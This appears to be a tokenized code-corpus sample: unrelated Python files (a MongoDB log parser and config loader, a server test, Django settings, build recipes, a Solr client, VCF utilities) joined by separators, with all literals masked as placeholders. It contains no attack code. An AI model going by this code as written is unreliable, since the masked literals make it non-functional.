"<STR_LIT:U+0020>" ) <EOL> for stat in split : <EOL> if stat is not "<STR_LIT>" and stat is not None and stat != "<STR_LIT>" : <EOL> stat_split = stat . split ( "<STR_LIT::>" ) <EOL> if ( stat_split is not None ) and ( stat_split is not "<STR_LIT>" ) and ( len ( stat_split ) is <NUM_LIT:2> ) : <EOL> try : <EOL> line_stats [ stat_split [ <NUM_LIT:0> ] ] = int ( stat_split [ <NUM_LIT:1> ] ) <EOL> except : <EOL> pass <EOL> return line_stats <EOL> def standardize_query ( self , query_yaml ) : <EOL> if len ( query_yaml . keys ( ) ) == <NUM_LIT:1> : <EOL> if '<STR_LIT>' in query_yaml : <EOL> return scrub ( query_yaml ) <EOL> if '<STR_LIT>' in query_yaml : <EOL> return OrderedDict ( [ ( '<STR_LIT>' , scrub ( query_yaml [ '<STR_LIT>' ] ) ) ] ) <EOL> if len ( query_yaml . keys ( ) ) == <NUM_LIT:2> : <EOL> query = None <EOL> orderby = None <EOL> if '<STR_LIT>' in query_yaml : <EOL> query = query_yaml [ '<STR_LIT>' ] <EOL> elif '<STR_LIT>' in query_yaml : <EOL> query = query_yaml [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in query_yaml : <EOL> orderby = query_yaml [ '<STR_LIT>' ] <EOL> elif '<STR_LIT>' in query_yaml : <EOL> orderby = query_yaml [ '<STR_LIT>' ] <EOL> if query is not None and orderby is not None : <EOL> return OrderedDict ( [ ( '<STR_LIT>' , scrub ( query ) ) , <EOL> ( '<STR_LIT>' , orderby ) ] ) <EOL> return OrderedDict ( [ ( '<STR_LIT>' , scrub ( query_yaml ) ) ] ) <EOL> class StandardQueryHandler ( QueryLineHandler ) : <EOL> def __init__ ( self ) : <EOL> self . name = '<STR_LIT>' <EOL> self . _regex = '<STR_LIT>' <EOL> self . _regex += '<STR_LIT>' <EOL> self . _regex += '<STR_LIT>' <EOL> self . _regex += '<STR_LIT>' <EOL> self . _rx = re . compile ( self . _regex ) <EOL> def do_handle ( self , input ) : <EOL> match = self . _rx . match ( input ) <EOL> if match is not None : <EOL> parsed = self . parse_query ( match . group ( '<STR_LIT>' ) ) <EOL> if parsed is not None : <EOL> result = OrderedDict ( ) <EOL> scrubbed = self . standardize_query ( parsed ) <EOL> result [ '<STR_LIT>' ] = scrubbed [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in scrubbed : <EOL> result [ '<STR_LIT>' ] = scrubbed [ '<STR_LIT>' ] <EOL> result [ '<STR_LIT>' ] = small_json ( scrubbed ) <EOL> result [ '<STR_LIT>' ] = match . group ( '<STR_LIT>' ) <EOL> result [ '<STR_LIT>' ] = self . parse_line_stats ( match . group ( '<STR_LIT>' ) ) <EOL> result [ '<STR_LIT>' ] [ '<STR_LIT>' ] = match . group ( '<STR_LIT>' ) <EOL> result [ '<STR_LIT>' ] = True <EOL> return result <EOL> return None <EOL> class CmdQueryHandler ( QueryLineHandler ) : <EOL> def __init__ ( self ) : <EOL> self . name = '<STR_LIT>' <EOL> self . _regex = '<STR_LIT>' <EOL> self . _regex += '<STR_LIT>' <EOL> self . _regex += '<STR_LIT>' <EOL> self . _regex += '<STR_LIT>' <EOL> self . _rx = re . compile ( self . _regex ) <EOL> def do_handle ( self , input ) : <EOL> match = self . _rx . match ( input ) <EOL> if match is not None : <EOL> parsed = self . parse_query ( match . group ( '<STR_LIT>' ) ) <EOL> if parsed is not None : <EOL> result = OrderedDict ( ) <EOL> result [ '<STR_LIT>' ] = self . parse_line_stats ( match . group ( '<STR_LIT>' ) ) <EOL> result [ '<STR_LIT>' ] [ '<STR_LIT>' ] = match . group ( '<STR_LIT>' ) <EOL> command = parsed . keys ( ) [ <NUM_LIT:0> ] <EOL> toMask = OrderedDict ( ) <EOL> result [ '<STR_LIT>' ] = command <EOL> result [ '<STR_LIT>' ] = True <EOL> if command . lower ( ) == '<STR_LIT:count>' : <EOL> result [ '<STR_LIT>' ] = match . group ( '<STR_LIT>' ) + '<STR_LIT:.>' <EOL> result [ '<STR_LIT>' ] += parsed [ command ] <EOL> query = self . standardize_query ( parsed [ '<STR_LIT>' ] ) <EOL> result [ '<STR_LIT>' ] = query [ '<STR_LIT>' ] <EOL> toMask = query <EOL> elif command . lower ( ) == '<STR_LIT>' : <EOL> if '<STR_LIT>' in parsed : <EOL> result [ '<STR_LIT>' ] = parsed [ '<STR_LIT>' ] <EOL> toMask [ '<STR_LIT>' ] = parsed [ '<STR_LIT>' ] <EOL> result [ '<STR_LIT>' ] = match . group ( '<STR_LIT>' ) + '<STR_LIT:.>' <EOL> result [ '<STR_LIT>' ] += parsed [ command ] <EOL> query = self . standardize_query ( parsed [ '<STR_LIT>' ] ) <EOL> result [ '<STR_LIT>' ] = query [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in parsed : <EOL> result [ '<STR_LIT>' ] = parsed [ '<STR_LIT>' ] <EOL> toMask [ '<STR_LIT>' ] = parsed [ '<STR_LIT>' ] <EOL> toMask [ '<STR_LIT>' ] = query <EOL> elif command . lower ( ) == '<STR_LIT>' : <EOL> result [ '<STR_LIT>' ] = match . group ( '<STR_LIT>' ) + '<STR_LIT:.>' <EOL> result [ '<STR_LIT>' ] += parsed [ command ] <EOL> query = self . standardize_query ( parsed [ '<STR_LIT>' ] ) <EOL> result [ '<STR_LIT>' ] = query <EOL> toMask = query <EOL> else : <EOL> result [ '<STR_LIT>' ] = False <EOL> result [ '<STR_LIT>' ] = match . group ( '<STR_LIT>' ) + '<STR_LIT>' <EOL> result [ '<STR_LIT>' ] = command <EOL> toMask [ '<STR_LIT>' ] = command <EOL> result [ '<STR_LIT>' ] = small_json ( toMask ) <EOL> return result <EOL> return None <EOL> class UpdateQueryHandler ( QueryLineHandler ) : <EOL> def __init__ ( self ) : <EOL> self . name = '<STR_LIT>' <EOL> self . _regex = '<STR_LIT>' <EOL> self . _regex += '<STR_LIT>' <EOL> self . _regex += '<STR_LIT>' <EOL> self . _regex += '<STR_LIT>' <EOL> self . _rx = re . compile ( self . _regex ) <EOL> def do_handle ( self , input ) : <EOL> match = self . _rx . match ( input ) <EOL> if match is not None : <EOL> parsed = self . parse_query ( match . group ( '<STR_LIT>' ) ) <EOL> if parsed is not None : <EOL> result = OrderedDict ( ) <EOL> scrubbed = self . standardize_query ( parsed ) <EOL> result [ '<STR_LIT>' ] = scrubbed [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in scrubbed : <EOL> result [ '<STR_LIT>' ] = scrubbed [ '<STR_LIT>' ] <EOL> result [ '<STR_LIT>' ] = small_json ( scrubbed ) <EOL> result [ '<STR_LIT>' ] = match . group ( '<STR_LIT>' ) <EOL> result [ '<STR_LIT>' ] = self . parse_line_stats ( match . group ( '<STR_LIT>' ) ) <EOL> result [ '<STR_LIT>' ] [ '<STR_LIT>' ] = match . group ( '<STR_LIT>' ) <EOL> result [ '<STR_LIT>' ] = True <EOL> return result <EOL> return None <EOL> class TimeLineHandler ( QueryLineHandler ) : <EOL> def __init__ ( self ) : <EOL> self . name = '<STR_LIT>' <EOL> self . _regex = '<STR_LIT>' <EOL> self . _rx = re . compile ( self . _regex ) <EOL> def do_handle ( self , input ) : <EOL> match = self . _rx . match ( input ) <EOL> if match is not None : <EOL> return { '<STR_LIT>' : "<STR_LIT:?>" , <EOL> '<STR_LIT>' : { "<STR_LIT>" : match . group ( '<STR_LIT>' ) } , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : None <EOL> } <EOL> return None </s>
<s> __author__ = '<STR_LIT>' <EOL> import json <EOL> import urllib <EOL> import mongoctl_globals <EOL> from utils import * <EOL> from minify_json import minify_json <EOL> from errors import MongoctlException <EOL> from bson import json_util <EOL> MONGOCTL_CONF_FILE_NAME = "<STR_LIT>" <EOL> __config_root__ = mongoctl_globals . DEFAULT_CONF_ROOT <EOL> def set_config_root ( root_path ) : <EOL> if not is_url ( root_path ) and not dir_exists ( root_path ) : <EOL> raise MongoctlException ( "<STR_LIT>" <EOL> "<STR_LIT>" % root_path ) <EOL> global __config_root__ <EOL> __config_root__ = root_path <EOL> def get_mongoctl_config_val ( key , default = None ) : <EOL> return get_mongoctl_config ( ) . get ( key , default ) <EOL> def set_mongoctl_config_val ( key , value ) : <EOL> get_mongoctl_config ( ) [ key ] = value <EOL> def get_generate_key_file_conf ( default = None ) : <EOL> return get_mongoctl_config_val ( '<STR_LIT>' , default = default ) <EOL> def get_database_repository_conf ( ) : <EOL> return get_mongoctl_config_val ( '<STR_LIT>' ) <EOL> def get_file_repository_conf ( ) : <EOL> return get_mongoctl_config_val ( '<STR_LIT>' ) <EOL> def get_mongodb_installs_dir ( ) : <EOL> installs_dir = get_mongoctl_config_val ( '<STR_LIT>' ) <EOL> if installs_dir : <EOL> return resolve_path ( installs_dir ) <EOL> def set_mongodb_installs_dir ( installs_dir ) : <EOL> set_mongoctl_config_val ( '<STR_LIT>' , installs_dir ) <EOL> def get_default_users ( ) : <EOL> return get_mongoctl_config_val ( '<STR_LIT>' , { } ) <EOL> def get_cluster_member_alt_address_mapping ( ) : <EOL> return get_mongoctl_config_val ( '<STR_LIT>' , { } ) <EOL> def to_full_config_path ( path_or_url ) : <EOL> global __config_root__ <EOL> if os . path . isabs ( path_or_url ) : <EOL> return resolve_path ( path_or_url ) <EOL> elif is_url ( path_or_url ) : <EOL> return path_or_url <EOL> else : <EOL> result = os . path . join ( __config_root__ , path_or_url ) <EOL> if not is_url ( __config_root__ ) : <EOL> result = resolve_path ( result ) <EOL> return result <EOL> __mongo_config__ = None <EOL> def get_mongoctl_config ( ) : <EOL> global __mongo_config__ <EOL> if __mongo_config__ is None : <EOL> __mongo_config__ = read_config_json ( "<STR_LIT>" , <EOL> MONGOCTL_CONF_FILE_NAME ) <EOL> return __mongo_config__ <EOL> def read_config_json ( name , path_or_url ) : <EOL> try : <EOL> log_verbose ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( name , path_or_url ) ) <EOL> json_str = read_json_string ( path_or_url ) <EOL> json_str = minify_json . json_minify ( json_str ) <EOL> json_val = json . loads ( json_str , <EOL> object_hook = json_util . object_hook ) <EOL> if not json_val and not isinstance ( json_val , list ) : <EOL> raise MongoctlException ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( name , path_or_url ) ) <EOL> else : <EOL> return json_val <EOL> except MongoctlException , e : <EOL> raise e <EOL> except Exception , e : <EOL> raise MongoctlException ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( name , path_or_url , e ) ) <EOL> def read_json_string ( path_or_url , validate_exists = True ) : <EOL> path_or_url = to_full_config_path ( path_or_url ) <EOL> if not is_url ( path_or_url ) : <EOL> if os . path . isfile ( path_or_url ) : <EOL> return open ( path_or_url ) . read ( ) <EOL> elif validate_exists : <EOL> raise MongoctlException ( "<STR_LIT>" % <EOL> path_or_url ) <EOL> else : <EOL> return None <EOL> response = urllib . urlopen ( path_or_url ) <EOL> if response . getcode ( ) != <NUM_LIT:200> : <EOL> msg = ( "<STR_LIT>" <EOL> % ( path_or_url , response . getcode ( ) ) ) <EOL> if validate_exists : <EOL> raise MongoctlException ( msg ) <EOL> else : <EOL> log_verbose ( msg ) <EOL> return None <EOL> else : <EOL> return response . read ( ) </s>
<s> import unittest <EOL> import time <EOL> from mongoctl . tests . test_base import MongoctlTestBase , append_user_arg <EOL> from mongoctl import config <EOL> import shutil <EOL> import os <EOL> SERVERS = [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:address>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:port>" : <NUM_LIT> , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : <NUM_LIT:4> <EOL> } <EOL> } , <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:address>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:port>" : <NUM_LIT> , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : <NUM_LIT:4> , <EOL> "<STR_LIT>" : True <EOL> } <EOL> } , <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:address>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:port>" : <NUM_LIT> , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : <NUM_LIT:4> , <EOL> "<STR_LIT>" : True <EOL> } <EOL> } , <EOL> ] <EOL> CLUSTERS = [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : True <EOL> } , <EOL> { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> } , <EOL> { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> } <EOL> ] <EOL> } , <EOL> ] <EOL> TEST_VERSIONS = [ <EOL> { <EOL> "<STR_LIT:version>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> { <EOL> "<STR_LIT:version>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> { <EOL> "<STR_LIT:version>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> { <EOL> "<STR_LIT:version>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> ] <EOL> class MultiMongoDBVersionsTest ( MongoctlTestBase ) : <EOL> def setUp ( self ) : <EOL> super ( MultiMongoDBVersionsTest , self ) . setUp ( ) <EOL> self . servers = SERVERS <EOL> self . clusters = CLUSTERS <EOL> def test_multi_versions ( self ) : <EOL> for version_conf in TEST_VERSIONS : <EOL> self . do_test_mongodb_version ( version_conf [ "<STR_LIT:version>" ] , version_conf [ "<STR_LIT>" ] ) <EOL> def do_test_mongodb_version ( self , mongo_version , mongo_edition ) : <EOL> self . mongoctl_assert_cmd ( [ "<STR_LIT>" , mongo_version , "<STR_LIT>" , mongo_edition ] ) <EOL> for server in SERVERS : <EOL> server [ "<STR_LIT>" ] = mongo_version <EOL> server [ "<STR_LIT>" ] = mongo_edition <EOL> self . assert_server_stopped ( "<STR_LIT>" ) <EOL> self . assert_server_stopped ( "<STR_LIT>" ) <EOL> self . assert_server_stopped ( "<STR_LIT>" ) <EOL> self . assert_start_server ( "<STR_LIT>" ) <EOL> self . assert_server_running ( "<STR_LIT>" ) <EOL> self . assert_start_server ( "<STR_LIT>" ) <EOL> self . assert_server_online ( "<STR_LIT>" ) <EOL> self . assert_start_server ( "<STR_LIT>" ) <EOL> self . assert_server_online ( "<STR_LIT>" ) <EOL> conf_cmd = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> append_user_arg ( conf_cmd ) <EOL> self . mongoctl_assert_cmd ( conf_cmd ) <EOL> print "<STR_LIT>" <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> self . mongoctl_assert_cmd ( conf_cmd ) <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT:15> ) <EOL> self . assert_stop_server ( "<STR_LIT>" ) <EOL> self . assert_server_stopped ( "<STR_LIT>" ) <EOL> self . assert_stop_server ( "<STR_LIT>" , force = True ) <EOL> self . assert_server_stopped ( "<STR_LIT>" ) <EOL> self . assert_stop_server ( "<STR_LIT>" , force = True ) <EOL> self . assert_server_stopped ( "<STR_LIT>" ) <EOL> self . tearDown ( ) <EOL> def get_my_test_servers ( self ) : <EOL> return map ( lambda server_conf : server_conf [ "<STR_LIT>" ] , SERVERS ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import os <EOL> import sys <EOL> DEBUG = True <EOL> TEMPLATE_DEBUG = DEBUG <EOL> ABSOLUTE_ROOT_PATH = ( os . path . dirname ( os . path . abspath ( __file__ ) ) ) <EOL> ADMINS = ( <EOL> ) <EOL> MANAGERS = ADMINS <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> TIME_ZONE = '<STR_LIT>' <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> SITE_ID = <NUM_LIT:1> <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> MEDIA_ROOT = os . path . join ( ABSOLUTE_ROOT_PATH , "<STR_LIT>" ) <EOL> MEDIA_URL = '<STR_LIT>' <EOL> STATIC_ROOT = '<STR_LIT>' <EOL> STATIC_URL = '<STR_LIT>' <EOL> ADMIN_MEDIA_PREFIX = '<STR_LIT>' <EOL> STATICFILES_DIRS = ( <EOL> os . path . join ( ABSOLUTE_ROOT_PATH , '<STR_LIT>' ) , <EOL> ) <EOL> STATICFILES_FINDERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> SECRET_KEY = '<STR_LIT>' <EOL> TEMPLATE_LOADERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> TEMPLATE_DIRS = ( <EOL> os . path . join ( ABSOLUTE_ROOT_PATH , '<STR_LIT>' ) , <EOL> ) <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> LOGGING = { <EOL> '<STR_LIT:version>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:class>' : '<STR_LIT>' <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> } <EOL> } </s>
<s> class FontConfigPackage ( Package ) : <EOL> def __init__ ( self ) : <EOL> Package . __init__ ( self , '<STR_LIT>' , '<STR_LIT>' , <EOL> configure_flags = [ '<STR_LIT>' ] , <EOL> sources = [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> ) <EOL> def build ( self ) : <EOL> if Package . profile . name == '<STR_LIT>' : <EOL> self . configure_flags . extend ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] ) <EOL> Package . build ( self ) <EOL> FontConfigPackage ( ) </s>
<s> class IntltoolPackage ( Package ) : <EOL> def __init__ ( self ) : <EOL> Package . __init__ ( self , '<STR_LIT>' , '<STR_LIT>' , <EOL> sources = [ <EOL> '<STR_LIT>' <EOL> ] <EOL> ) <EOL> IntltoolPackage ( ) </s>
<s> class LibvorbisPackage ( XiphPackage ) : <EOL> def __init__ ( self ) : <EOL> XiphPackage . __init__ ( self , <EOL> project = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' ) <EOL> self . configure = '<STR_LIT>' <EOL> self . sources . append ( '<STR_LIT>' ) <EOL> def prep ( self ) : <EOL> Package . prep ( self ) <EOL> self . sh ( '<STR_LIT>' ) <EOL> LibvorbisPackage ( ) </s>
<s> class WebkitPackage ( Package ) : <EOL> def __init__ ( self ) : <EOL> Package . __init__ ( self , '<STR_LIT>' , '<STR_LIT>' , <EOL> sources = [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> configure_flags = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) <EOL> if Package . profile . name == '<STR_LIT>' : <EOL> self . configure_flags . extend ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] ) <EOL> self . sources . extend ( [ <EOL> '<STR_LIT>' <EOL> ] ) <EOL> def prep ( self ) : <EOL> Package . prep ( self ) <EOL> if Package . profile . name == '<STR_LIT>' : <EOL> for p in range ( <NUM_LIT:1> , len ( self . sources ) ) : <EOL> self . sh ( '<STR_LIT>' + str ( p ) + '<STR_LIT>' ) <EOL> WebkitPackage ( ) </s>
<s> '''<STR_LIT>''' <EOL> from django import template <EOL> register = template . Library ( ) <EOL> @ register . filter <EOL> def in_list ( value , arg ) : <EOL> '''<STR_LIT>''' <EOL> return value in arg </s>
<s> import json <EOL> import logging <EOL> from . transport import TransportRequests <EOL> from . schema import Schema <EOL> from . exceptions import * <EOL> from . solrresp import SolrResponse <EOL> from collections import defaultdict <EOL> class Collections ( ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , solr , log ) : <EOL> self . solr = solr <EOL> self . logger = log <EOL> def api ( self , action , args = { } ) : <EOL> '''<STR_LIT>''' <EOL> args [ '<STR_LIT:action>' ] = action . upper ( ) <EOL> res , con_info = self . solr . transport . send_request ( endpoint = '<STR_LIT>' , params = args ) <EOL> if '<STR_LIT>' in res and res [ '<STR_LIT>' ] [ '<STR_LIT:status>' ] == <NUM_LIT:0> : <EOL> return res , con_info <EOL> else : <EOL> raise SolrError ( "<STR_LIT>" . format ( con_info , res ) ) <EOL> def clusterstatus ( self ) : <EOL> '''<STR_LIT>''' <EOL> res , con_info = self . api ( '<STR_LIT>' ) <EOL> cluster = res [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> out = { } <EOL> try : <EOL> for collection in cluster : <EOL> out [ collection ] = { } <EOL> for shard in cluster [ collection ] [ '<STR_LIT>' ] : <EOL> out [ collection ] [ shard ] = { } <EOL> for replica in cluster [ collection ] [ '<STR_LIT>' ] [ shard ] [ '<STR_LIT>' ] : <EOL> out [ collection ] [ shard ] [ replica ] = cluster [ collection ] [ '<STR_LIT>' ] [ shard ] [ '<STR_LIT>' ] [ replica ] <EOL> if out [ collection ] [ shard ] [ replica ] [ '<STR_LIT:state>' ] != '<STR_LIT>' : <EOL> self . logger . error ( "<STR_LIT>" . format ( collection , shard , replica ) ) <EOL> except Exception as e : <EOL> self . logger . error ( "<STR_LIT>" ) <EOL> self . logger . exception ( e ) <EOL> return out <EOL> def _for_core ( self , cluster_resp = None ) : <EOL> if cluster_resp is None : <EOL> cluster_resp = self . clusterstatus ( ) <EOL> for collection in cluster_resp : <EOL> for shard in cluster_resp [ collection ] : <EOL> for core in cluster_resp [ collection ] [ shard ] : <EOL> yield collection , shard , core , cluster_resp [ collection ] [ shard ] [ core ] <EOL> def _for_shard ( self , cluster_resp = None ) : <EOL> if cluster_resp is None : <EOL> cluster_resp = self . clusterstatus ( ) <EOL> for collection in cluster_resp : <EOL> for shard in cluster_resp [ collection ] : <EOL> yield collection , shard , cluster_resp [ collection ] [ shard ] <EOL> def _check_collection ( self , collection , cluster_resp = None ) : <EOL> for coll , shard , core , c_data in self . _for_core ( cluster_resp ) : <EOL> if collection == coll : <EOL> if c_data [ '<STR_LIT:state>' ] != '<STR_LIT>' : <EOL> return False <EOL> return True <EOL> self . logger . error ( "<STR_LIT>" . format ( collection ) ) <EOL> def get_collection_counts ( self , cluster_resp = None ) : <EOL> '''<STR_LIT>''' <EOL> from SolrClient import SolrClient <EOL> temp = { } <EOL> for coll , shard , core , c_data in self . _for_core ( cluster_resp ) : <EOL> if coll not in temp : <EOL> temp [ coll ] = { } <EOL> if shard not in temp [ coll ] : <EOL> temp [ coll ] [ shard ] = { } <EOL> ts = SolrClient ( c_data [ '<STR_LIT>' ] ) <EOL> temp [ coll ] [ shard ] [ c_data [ '<STR_LIT>' ] ] = ts . query ( c_data [ '<STR_LIT>' ] , <EOL> { '<STR_LIT:q>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : '<STR_LIT:false>' , <EOL> } ) . get_num_found ( ) <EOL> return temp <EOL> def check_collection_counts ( self , counts = None , cb = None ) : <EOL> if counts is None : <EOL> counts = self . get_collection_counts ( ) <EOL> for collection , shard , s_data in self . _for_shard ( counts ) : <EOL> for replica in s_data : <EOL> self . logger . info ( "<STR_LIT>" . format ( collection , shard , replica , s_data [ replica ] ) ) <EOL> if len ( set ( s_data . values ( ) ) ) > <NUM_LIT:1> : <EOL> self . logger . error ( "<STR_LIT>" . format ( collection , shard , replica , "<STR_LIT:/>" . join ( [ str ( x ) for x in list ( s_data . values ( ) ) ] ) ) ) <EOL> if cb : <EOL> if hasattr ( cb , '<STR_LIT>' ) : <EOL> self . logger . debug ( "<STR_LIT>" ) <EOL> cb ( s_data ) <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> return counts <EOL> def check_collections ( self , collection = None ) : <EOL> cluster = self . clusterstatus ( ) <EOL> out = { } <EOL> for coll in cluster . keys ( ) : <EOL> out [ coll ] = self . _check_collection ( coll , cluster ) <EOL> self . logger . info ( "<STR_LIT>" . format ( coll , "<STR_LIT>" if out [ coll ] else "<STR_LIT>" ) ) <EOL> return out </s>
<s> from __future__ import absolute_import <EOL> from . make_haploblocks import get_haploblocks <EOL> from . genetic_models import check_genetic_models <EOL> from . model_score import get_model_score <EOL> from . fix_variant import make_print_version <EOL> from . variant_annotator import VariantAnnotator </s>
<s> """<STR_LIT>""" <EOL> import string <EOL> import logging <EOL> logging = logging . getLogger ( __name__ ) <EOL> def get_variant_dict ( variant_line , header_line ) : <EOL> """<STR_LIT>""" <EOL> return dict ( zip ( header_line , variant_line . rstrip ( ) . split ( '<STR_LIT:\t>' ) ) ) <EOL> def get_info_dict ( info_line ) : <EOL> """<STR_LIT>""" <EOL> variant_info = { } <EOL> for raw_info in info_line . split ( '<STR_LIT:;>' ) : <EOL> splitted_info = raw_info . split ( '<STR_LIT:=>' ) <EOL> if len ( splitted_info ) == <NUM_LIT:2> : <EOL> variant_info [ splitted_info [ <NUM_LIT:0> ] ] = splitted_info [ <NUM_LIT:1> ] <EOL> else : <EOL> variant_info [ splitted_info [ <NUM_LIT:0> ] ] = [ ] <EOL> return variant_info <EOL> def get_variant_id ( variant_dict ) : <EOL> """<STR_LIT>""" <EOL> chrom = variant_dict [ '<STR_LIT>' ] <EOL> pos = variant_dict [ '<STR_LIT>' ] <EOL> ref = variant_dict [ '<STR_LIT>' ] <EOL> bad_chars = "<STR_LIT>" <EOL> alt = '<STR_LIT>' . join ( c for c in variant_dict [ '<STR_LIT>' ] if c not in bad_chars ) <EOL> return '<STR_LIT:_>' . join ( [ chrom , pos , ref , alt ] ) <EOL> def get_vep_dict ( vep_string , vep_header , allele = None ) : <EOL> """<STR_LIT>""" <EOL> vep_dict = { } <EOL> for vep_annotation in vep_string . split ( '<STR_LIT:U+002C>' ) : <EOL> inner_dict = dict ( zip ( vep_header , vep_annotation . split ( '<STR_LIT:|>' ) ) ) <EOL> if '<STR_LIT>' in inner_dict : <EOL> allele = inner_dict [ '<STR_LIT>' ] <EOL> if allele in vep_dict : <EOL> vep_dict [ allele ] . append ( inner_dict ) <EOL> else : <EOL> vep_dict [ allele ] = [ inner_dict ] <EOL> return vep_dict </s>
<s> from tempfile import NamedTemporaryFile <EOL> from multiprocessing import Manager <EOL> from collections import OrderedDict <EOL> from genmod . utils import VariantPrinter <EOL> from genmod . vcf_tools import ( get_variant_dict , get_info_dict , <EOL> get_variant_id , HeaderParser ) <EOL> def setup_vcf_file ( ) : <EOL> """<STR_LIT>""" <EOL> vcf_lines = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' '<STR_LIT>' , <EOL> '<STR_LIT>' '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> vcf_file = NamedTemporaryFile ( mode = '<STR_LIT>' , delete = False , suffix = '<STR_LIT>' ) <EOL> vcf_file . writelines ( vcf_lines ) <EOL> vcf_file . seek ( <NUM_LIT:0> ) <EOL> vcf_file . close ( ) <EOL> return vcf_file . name <EOL> def test_variant_printer ( ) : <EOL> """<STR_LIT>""" <EOL> vcf_file = setup_vcf_file ( ) <EOL> variant_queue = Manager ( ) . Queue ( ) <EOL> head = HeaderParser ( ) <EOL> outfile = NamedTemporaryFile ( mode 